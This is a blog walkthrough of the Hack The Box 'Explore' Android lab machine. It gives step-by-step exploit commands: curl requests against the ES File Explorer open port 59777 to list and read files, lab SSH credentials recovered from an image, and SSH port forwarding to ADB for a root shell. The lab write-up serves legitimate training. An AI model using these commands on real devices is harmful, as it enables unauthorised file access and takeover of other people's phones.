EXPLORE ANDROID MACHINE
WELCOME TO TAMILCODE
HERE IS TRICKS AND TECHNOLOGY
So in this session, we going to see the solution or write up for the android hack the box
a machine which is called explore .. so it is an android machine so we going to take the user flag and root flag ... so let we start
first of all turn on your hack the box VPN to connect to the machine
next load the IP in the browser it will show unable to connect don't fear it has been working...
Why it has been showing unable to connect?
because it has been running in the HTTPS ......
or check whether it is alive using ping ...
STEP 1: ping 10.10.10.247
now you the get ICMP request or see the below picture what is it ???
so next we going took the Nmap scan unfortunately the Nmap took very slow to scan
this bull sit ... so we took the rustscan for fast scan .. in this modern day the rustscan
is best for port scanning so download using the below link...
using the above link you will enter into that website and download the deb file which is
rustscan_2.0.1_amd64.deb it is only for kali Linux users or parrot os or ubuntu...
if you are using another Linux please visit the official website link is below .......
download the rustscan for a fast scan using the below command
STEP 2: dpkg -i rustscan_2.0.1_amd64.deb
now the tool get in your machine so type rustscan -h you get the general command
to use the tool...
STEP 3: rustscan -a 10.10.10.247
the -a has been used to denote the IP address or host ...
now you will get the result ( shown below image )
so in this scan will get the four interesting port which is
10.10.10.247:2222
10.10.10.247:41933
10.10.10.247:42135
10.10.10.247:59777
this port is scanned ...
So load IP address in the browser using below step
STEP 4: 10.10.10.246:59777
now you can able access the website using the above HTTP (59777) (show in the below
image)
further analyzing this port we only interesting which is 59777 and I have searched
in google, we get one interesting article link is below ...
by seeing the above article we get vulnerability in the port of 59777 .. which is HTTP
services...
the vulnerability is EX file explore open port vulnerability in (59777)
WHAT IS EX FILE EXPLORE?
it is an android file manager that has been used to store the video, audio, image
and files etc .....
so in the port has EX file explore vulnerability ......
WHAT IS VULNERABILITY IN EX FILE EXPLORE?
it is an open port vulnerability .. so when the user opens the application the HTTP server
will be started in back if someone connected in your network locally he also able
to access your file in ex file explore and download your file without permission
and remotely install the app on mobile without permission...
FOR CLEAR INFORMATION READ THE BELOW WEBSITE :
So i think now you get clear so let coming back to our tropic ...
download the code in github command is below
STEP 5: https://github.com/fs0c131y/ESFileExplorerOpenPortVuln.git
STEP 6: cd ESFileExplorerOpenPortVuln
STEP 7: python poc.py --cmd getDeviceInfo --ip 10.10.10.247
now you will get information about the machine so in this case, you will able
see the sdcard ...
so now we going to exploit using the curl command is below ( please copy and paste )
curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://10.10.10.247:59777/sdcard/
BOOOOOMMMMMMMMMM!!!!
Now you will able to see the user.txt which user flag
so now load user.txt in your browser using the below command ......
STEP 8: http://10.10.10.247:59777/sdcard/user.txt
now you will able to see the user.txt which user flag...
so now we get the user flag .. so next our target is going to take over the root flag
further analyzing the sdcard file we get the DCIM folder so now load the folder ...
so next we going to list the file in DCIM folder ... ( by using the same payload )
curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://10.10.10.247:59777/sdcard/DCIM
by listing the file inside the folder we get some images ( shown below image )
by checking the image one by one we got the credential in credit.jpg
so load the credit.jpg in the browser you will get credentials in the image...
SO THE USERNAME: kristi and PASSWORD: Kr1sT!5h@Rp3xPl0r3!
so now we going login into the 2222 port which has been seen in the port scan ...
STEP 9: ssh -p 2222 kristi@10.10.10.247
now it will ask the entered password: Kr1sT!5h@Rp3xPl0r3!
now you get login successfully so let we going enter into the data folder
STEP 10: cd data
STEP 11: ls
it will show the permission denied ............................
so further i have researched more articles there is nothing, at last, i get one article
which is about ADB shell ...
WHAT IS ADB SHELL?
ADB = android debug bridge
for more information see my below article
in the ADB shell, we may able to port forward using the 5555 port is given in the
below article .....
so now we going port forward in 5555 port in localhost
for kind information it not a flaw in ADB so you cannot do in the non-root device it
only applicable for root devices...
so next open the new terminal in your machine and type the below command ....
STEP 11: ssh -p 2222 -L 5555:localhost:5555 kristi@10.10.10.247
so it will ask the password so enter password : Kr1sT!5h@Rp3xPl0r3! ...
now it get port forward ....
so in this case now ssh is port forward to the localhost in 5555 port...
now we going to install ADB tool
STEP 12: sudo apt-get install android-tools-adb
now it will be installed....... next open the new terminal and enter the below command
STEP 13: adb connect localhost:5555
STEP 14: adb shell
now you will get the shell ( shown in the below image )
STEP 15: su
STEP 16: cd data
STEP 17: ls
booooooooooooooooooooooooooooooooooooooooooom !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
now you get root.txt which root flag is shown in the image
IF ANY ERROR CAME IN HACK THE BOX CONTACT IN THE TELEGRAM
THE LINK IS HERE AND FOLLOW US
I HOPE YOU WILL UNDERSTAND THIS ARTICLE PLEASE SHARE,COMMENT, LIKE SUBSCRIBE TO MY WEBSITE .....IF YOU LIKED THE ARTICLES PLEASE DONATED TO US USING THE BELOW LINK :
hi anna can you explain me about that curl command
ReplyDeletePost a Comment